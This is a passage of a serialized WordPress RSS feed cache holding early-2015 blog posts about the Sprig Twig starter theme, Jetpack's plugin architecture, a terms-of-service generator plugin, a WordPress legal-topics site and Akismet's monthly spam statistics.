Engine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37053\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"http://wptavern.com/sprig-a-wordpress-starter-theme-that-features-the-twig-templating-engine\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4167:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/sprig.png\" rel=\"prettyphoto[37053]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/sprig.png?resize=857%2C390\" alt=\"sprig\" class=\"aligncenter size-full wp-image-38303\" /></a></p>\n<p>Those who are new to WordPress theming are often confused by the mixture of PHP and HTML markup in templates. It’s easy to accidentally break theme functionality when everything is placed in the same file.</p>\n<p>For that reason, there’s a strong contingency of developers who prefer to integrate the <a href=\"http://twig.sensiolabs.org/\" target=\"_blank\">Twig</a> PHP templating engine with WordPress, using a starter theme or via plugins like <a href=\"https://wordpress.org/plugins/twigpress/\" target=\"_blank\">TwigPress</a>, <a href=\"https://wordpress.org/plugins/timber-library/\" target=\"_blank\">Timber</a>, or the like. Fans of Twig appreciate its concise syntax and find that it makes templates more readable.</p>\n<p><a href=\"http://sprigwp.com/\" target=\"_blank\">Sprig</a> is a new Twig-based starter theme for WordPress created by developer <a href=\"http://zach-adams.com/\" target=\"_blank\">Zach Adams</a>. The theme incorporates the power and flexibility of Twig templating to speed up development and make WordPress templates easier to edit.</p>\n<p>Here’s an example of what the WordPress loop looks like in Sprig:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">{% for post in posts() %}\n {% include \'content/content-excerpt.twig\' %}\n{% endfor %}</pre>\n<p>For those who have never worked with a templating engine, the syntax may look rather unfamiliar, but the advantage is that it allows you to separate the necessities of getting/manipulating your data and rendering it out. Below is an example of the WordPress loop with arguments:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">\n{% for post in posts({\n \'post_type\':\'post\',\n \'posts_per_page\':4\n}) %}\n {% include \'content/content-excerpt.twig\' %}\n{% endfor %}</pre>\n<p> </p>\n<h5>Sprig Features</h5>\n<p>Sprig utilizes Bower for frontend package management. It comes pre-loaded with either <a href=\"https://github.com/zach-adams/sprig\" target=\"_blank\">Bootstrap</a> or <a href=\"https://github.com/zach-adams/sprig-foundation\" target=\"_blank\">Foundation</a> to get started. Sprig uses <a href=\"http://gulpjs.com/\" target=\"_blank\">Gulp</a> to automate tasks such as compiling, concatenating, and minifying CSS and Javascript.</p>\n<p>The theme was developed using the best parts of <a href=\"http://underscores.me/\" target=\"_blank\">Underscores</a>, <a href=\"http://roots.io/starter-theme/\" target=\"_blank\">Roots</a>, and <a href=\"https://wordpress.org/plugins/twigpress/\" target=\"_blank\">TwigPress</a>, which bring in a number of additional functions and scripts useful for theme development.</p>\n<h3>Does Twig Introduce a New Layer of Abstraction?</h3>\n<p>The main argument some theme developers have against using a templating engine like Twig is that it introduces a new layer of abstraction, as well as another thing to learn on top of WordPress’ usual way of structuring template files. Some believe that the <a href=\"http://en.wikipedia.org/wiki/Separation_of_concerns\" target=\"_blank\">separation of concerns</a> prohibits a theme developer from gaining a true understanding of how WordPress works.</p>\n<p>Adams clearly states that the purpose of Sprig is to help theme developers spend less time wading through template markup code and instead focus their efforts on creating beautiful themes. The Twig templating engine may not be your cup of tea, but many developers find that it helps them produce cleaner template code that is easier to reuse.</p>\n<p>If <a href=\"http://sprigwp.com/\" target=\"_blank\">Sprig</a> helps get you from here to there faster, then it might be worth incorporating into your theme development workflow. Check out the full <a href=\"https://github.com/zach-adams/sprig\" target=\"_blank\">documentation on GitHub</a>. The project is still under active development and Adams recommends you test Sprig heavily before using it in production.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 20:31:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"WPTavern: Part 1: George Stephanis on Why Jetpack is Not a Collection of Plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38269\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:89:\"http://wptavern.com/part-1-george-stephanis-on-why-jetpack-is-not-a-collection-of-plugins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2836:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/JetpackPluginCollectionFeaturedImage.png\" rel=\"prettyphoto[38269]\"><img class=\"size-full wp-image-38279\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/JetpackPluginCollectionFeaturedImage.png?resize=638%2C200\" alt=\"Jetpack Plugin Collection Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/northbaywanderer/121971388/\">northbaywanderer</a> – <a href=\"http://creativecommons.org/licenses/by-sa/2.0/\">cc</a>\n<p>George Stephanis, who is a member of the Jetpack Pit Crew, published a post over the weekend that explains why <a title=\"http://stephanis.info/2015/01/31/why-jetpack-isnt-a-collection-of-plugins-part-the-first/\" href=\"http://stephanis.info/2015/01/31/why-jetpack-isnt-a-collection-of-plugins-part-the-first/\">Jetpack is not a collection of plugins</a>. According to Stephanis, dependency management in WordPress sucks. In a nutshell, a dependency is when a library, framework, component, theme, or plugin requires the existence of another to function. He gives a practical example of dependencies that highlights how quickly things could get messy.</p>\n<blockquote><p>Now, if <strong>Likes</strong>, <strong>Single Sign On</strong>, <strong>After the Deadline</strong>, <strong>Post by Email</strong> and others were their own plugins, and connected to a separate <strong>Jetpack Core</strong> plugin, versioning gets tricky. It could work, in theory, if every plugin is kept up to date, always and forever. But the instant that the user is using, say, an outdated version of <strong>Subscriptions</strong> with an outdated <strong>Jetpack Core</strong> (which work perfectly together), and then installs the up-to-date <strong>WP.me Shortlinks</strong> plugin, things could break because <strong>WP.me Shortlinks</strong> expects a more up-to-date <strong>Jetpack Core</strong>.</p>\n<p>So you go ahead and update <strong>Jetpack Core</strong> to current, but now <strong>Subscriptions</strong> — which used to work perfectly — now breaks because there was a method change in <strong>Jetpack Core</strong>, that is fixed in the up-to-date version of <strong>Subscriptions</strong>, but the user isn’t running the up-to-date version. Horrible UX.</p></blockquote>\n<p>He goes on to describe the installation flow for a plugin that needs Jetpack Core to function. A plugin that depends on Jetpack Core adds at least four additional steps to the installation flow.</p>\n<p>It’s a good article that answers the technical side of a commonly asked question. It also gives insight to those who may be thinking of creating alternatives to Jetpack using a similar model. In part two of the series, Stephanis plans to write about the variety of other reasons Jetpack is not a collection of plugins.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 17:46:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"WPTavern: How to Automatically Create Terms of Service and Privacy Policy Documents\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38257\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"http://wptavern.com/how-to-automatically-create-terms-of-service-and-privacy-policy-documents\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3716:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginFeaturedImage.png\" rel=\"prettyphoto[38257]\"><img class=\"aligncenter size-full wp-image-38262\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginFeaturedImage.png?resize=838%2C272\" alt=\"Auto Terms of Service Plugin Featured Image\" /></a></p>\n<p>If you own or operate a business and need a Terms of Service, Privacy, or various other legal documents, check out the <a title=\"https://github.com/Automattic/legalmattic\" href=\"https://github.com/Automattic/legalmattic\">Legalmattic repository</a> on Github. In 2014, Automattic open sourced all of its legal documents, including <a title=\"http://wptavern.com/automattic-open-sources-its-dmca-process-docs-on-github\" href=\"http://wptavern.com/automattic-open-sources-its-dmca-process-docs-on-github\">its DMCA takedown notice</a>. If you choose an Automattic legal document as a foundation to write your own, consider using the <a title=\"https://wordpress.org/plugins/auto-terms-of-service-and-privacy-policy/\" href=\"https://wordpress.org/plugins/auto-terms-of-service-and-privacy-policy/\">Auto Terms of Service and Privacy Policy plugin. </a></p>\n<p>Created by <a title=\"http://tourkick.com/\" href=\"http://tourkick.com/\">Clifford Paulick</a>, this plugin places the information entered into a version of Automattic’s <a href=\"http://en.wordpress.com/tos/\" rel=\"nofollow\">Terms of Service</a> and <a href=\"http://automattic.com/privacy/\" rel=\"nofollow\">Privacy Policy</a>, both available under the <a href=\"http://creativecommons.org/licenses/by-sa/3.0/\" rel=\"nofollow\">Creative Commons Sharealike</a> license. The documents are modified to exclude specifics to Automattic, such as mentions of Jetpack, WordPress.com, and VIP. Each document has generic language that can apply to most sites and service providers, including single sites, subscription sites, blog networks, and others.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginSettings.png\" rel=\"prettyphoto[38257]\"><img class=\"size-full wp-image-38258\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginSettings.png?resize=784%2C859\" alt=\"Add Your Company Info\" /></a>Add Your Company Info\n<p>Configuration is as simple as placing company information into the appropriate fields. Once entered, you’ll need to turn on the Display setting at the top to enable the three different shortcodes.</p>\n<ul>\n<li>[my_terms_of_service_and_privacy_policy]</li>\n<li>[my_terms_of_service]</li>\n<li>[my_privacy_policy]</li>\n</ul>\n<p>Here’s what the Tavern terms of service page looks like using the terms of service shortcode.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginResult.png\" rel=\"prettyphoto[38257]\"><img class=\"size-full wp-image-38259\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/AutoTermsOfServicePluginResult.png?resize=731%2C826\" alt=\"Tavern Terms of Use Page\" /></a>Tavern Terms of Use Page\n<p>The plugin works as advertised and is a convenient way to provide legal documents if you’re a service provider like Automattic. However, if you need to fine tune the results, you can either copy the output from the shortcode and paste it into the page or use the source document from the <a title=\"https://github.com/Automattic/legalmattic\" href=\"https://github.com/Automattic/legalmattic\">Legalmattic repository</a>. While Automattic’s documents give you a head start, it’s probably still a good idea to seek legal counsel to review and edit them so they’re specifically tailored to your business.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 17:28:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: Richard Best Launches New Website Devoted to WordPress Legal Topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38247\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/richard-best-launches-new-website-devoted-to-wordpress-legal-topics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2361:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/WPandLegalStuffFeaturedImage.png\" rel=\"prettyphoto[38247]\"><img class=\"size-full wp-image-38254\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/WPandLegalStuffFeaturedImage.png?resize=639%2C300\" alt=\"WP and Legal Stuff Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/c_nilsen/16359004332/\">c_nilsen</a> – <a href=\"http://creativecommons.org/licenses/by-nc-sa/2.0/\">cc</a>\n<p>Over the weekend, I stumbled across a new resource called <a title=\"http://wpandlegalstuff.com/\" href=\"http://wpandlegalstuff.com/\">WP and Legal Stuff </a>run by <a title=\"http://wpandlegalstuff.com/about/\" href=\"http://wpandlegalstuff.com/about/\">Richard Best</a>, a qualified lawyer in New Zealand, England, and Wales. The site focuses on legal matters related to WordPress and open source. Recent articles include:</p>\n<ul>\n<li><a title=\"http://wpandlegalstuff.com/using-wordpress-trademarks-business-product-service/\" href=\"http://wpandlegalstuff.com/using-wordpress-trademarks-business-product-service/\">Using the WordPress trademarks for your business, product or service</a></li>\n<li><a title=\"http://wpandlegalstuff.com/gpl-wpscan-vane/\" href=\"http://wpandlegalstuff.com/gpl-wpscan-vane/\">The GPL and the story of WPScan and Vane</a></li>\n<li><a title=\"http://wpandlegalstuff.com/automattic-open-licensing-open-data/\" href=\"http://wpandlegalstuff.com/automattic-open-licensing-open-data/\">Automattic, open licensing and open data</a></li>\n</ul>\n<p>His take on <a title=\"http://wpandlegalstuff.com/understanding-gpl-licensing-wordpress/\" href=\"http://wpandlegalstuff.com/understanding-gpl-licensing-wordpress/\">understanding the GPL licensing of WordPress</a> is a great primer for anyone not familiar with how it works. While Best does not give legal advice through the site, he provides an interesting perspective since most of the people who participate in WordPress legal discussions are not lawyers.</p>\n<p>WP and Legal Stuff is a unique site and one of the few to cover WordPress legal matters on a routine basis. I highly suggest you subscribe to <a title=\"http://wpandlegalstuff.com/feed/\" href=\"http://wpandlegalstuff.com/feed/\">his RSS feed</a> so you don’t miss his next post on WordPress themes, the GPL, and the conundrum of derivative works.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 02 Feb 2015 16:37:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Matt: Tech is Ridiculous\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44640\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://ma.tt/2015/02/tech-is-ridiculous/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:433:\"<blockquote><p>Yo’s Law: “in the 21st century tech industry, satire and reality are not merely indistinguishable but actually interchangeable.”</p></blockquote>\n<p>From Jon Evans’ <a href=\"http://techcrunch.com/2015/01/24/this-industry-is-still-completely-ridiculous/\">This Industry Is Still Completely Ridiculous</a>, a hilarious article with a conclusion (the ridiculous stuff is worth it) I agree with.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 01 Feb 2015 22:12:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"Akismet: January 2015 Stats Roundup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.akismet.com/?p=1777\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"http://blog.akismet.com/2015/02/01/january-2015-stats-roundup/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3884:\"<p>January has been a slow and steady month in Akismet-land. Whereas <a href=\"http://blog.akismet.com/2014/12/01/november-stats-roundup/\">in</a> <a href=\"http://blog.akismet.com/2014/10/01/september-stats-roundup/\">months</a> <a href=\"http://blog.akismet.com/2014/11/03/october-stats-roundup/\">prior</a>, we’ve broken daily spam records, in January the spammers took it easy and we never saw a day with over 300 million spam comments caught.</p>\n<div id=\"attachment_1778\" class=\"wp-caption alignnone\"><img class=\"size-large wp-image-1778\" src=\"https://akismet.files.wordpress.com/2015/02/akismet-spam-and-ham-stats-january-2015.png?w=700&h=438\" alt=\"graph of akismet spam and ham daily stats january 2015\" /><p class=\"wp-caption-text\">The busiest day in January was the 4th, with almost 257 million comments, and the slowest was the 29th with just over 174 million comments.</p></div>\n<p>The <strong>total number of spam comments caught in January was a mere 6,586,661,000</strong> – compare that to the over 10 billion comments in December,<strong> that’s a drop of 35%</strong>. We did have more comments this month than the same time last year – 5% more.</p>\n<div id=\"attachment_1780\" class=\"wp-caption alignright\"><img class=\"size-medium wp-image-1780\" src=\"https://akismet.files.wordpress.com/2015/02/antique-map-of-the-world.jpg?w=300&h=211\" alt=\"Antique map of the world\" width=\"300\" height=\"211\" /><p class=\"wp-caption-text\">This image, “<a href=\"https://www.flickr.com/photos/38703275@N06/6884641242\">Old Map (90)</a>” by <a href=\"https://www.flickr.com/photos/38703275@N06/\">rosario fiore</a>, is licensed under <a href=\"https://creativecommons.org/licenses/by-nd/2.0/\">CC BY-ND 2.0</a></p></div>\n<p>Let’s put this number in perspective. The latest figures for the world population were published in 2013 by the <a href=\"http://data.worldbank.org/\">world bank</a>, and the number was just over 7 billion.</p>\n<p>If we wrote down each spam comment caught this month on a piece of paper, and handed out each of these notes to one person in the world, we’d have enough people on earth to hold all of the papers. In fact, we’d have some people left over that didn’t need to hold a piece of paper.</p>\n<p>In contrast <strong>there were only 157,555,500 legitimate comments that came through</strong> this month. <strong>Legitimate comments account for about 2%</strong> of all the content Akismet sees come through.</p>\n<p>If we wrote down each legitimate comment we got this month on a piece of paper and gave each to one person, we’d need just 2% of the world population in order to hold them all.</p>\n<p>As for Akismet’s uptime: there were no service interruptions this month. You can find information about any performance issues on this blog, via <a href=\"https://twitter.com/akismet\">Twitter</a>, and on this <a href=\"http://status.automattic.com/9931/136079/Akismet-API\">status page</a>.</p>\n<p>You may have also seen a drop in spam comments this month on your own blog. If you are having any issues with spam or with Akismet, please feel free to <a href=\"http://akismet.com/contact/\">contact us</a>, we’re happy to help <span class=\"wp-smiley wp-emoji wp-emoji-mrgreen\" title=\":mrgreen:\">:mrgreen:</span>.</p>\n<p><em>This post is part of a monthly series summarizing some stats and figures from the Akismet universe. Feel free to browse <a href=\"http://blog.akismet.com/category/monthly-roundup/\">all of the posts in the series</a>.</em></p><br /> <a rel=\"nofollow\" href=\"http://feeds.wordpress.com/1.0/gocomments/akismet.wordpress.com/1777/\"><img alt=\"\" border=\"0\" src=\"http://feeds.wordpress.com/1.0/comments/akismet.wordpress.com/1777/\" /></a> <img alt=\"\" border=\"0\" src=\"http://pixel.wp.com/b.gif?host=blog.akismet.com&blog=116920&post=1777&subd=akismet&ref=&feed=1\" width=\"1\" height=\"1\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 01 Feb 2015 16:57:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Valerie\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"Matt: Federated Wikipedia\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44622\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:41:\"http://ma.tt/2015/01/federated-wikipedia/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:475:\"<p><a href=\"http://blog.jonudell.net/2015/01/22/a-federated-wikipedia/\">A federated Wikipedia by Jon Udell</a> talks about the ossification happening in the Wikipedia community, caused in part by its attachment to rules that were created with the best of intentions. All open source communities, including <a href=\"http://wordpress.org/\">WordPress</a>, have to be vigilant against this. Sometimes we have to throw out what worked before to create what will work tomorrow.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 31 Jan 2015 22:50:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Matt: John Scalzi on Semicolons\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44629\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"http://ma.tt/2015/01/john-scalzi-on-semicolons/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:965:\"<blockquote><p>I write novels. And with just about every novel I write, I try to do something new or different that I haven’t done before, in order to challenge myself as a writer, and to keep developing my skills. In The Android’s Dream, of example, I wrote in the third person for the first time; in Zoe’s Tale, I had a main character—a sixteen year old 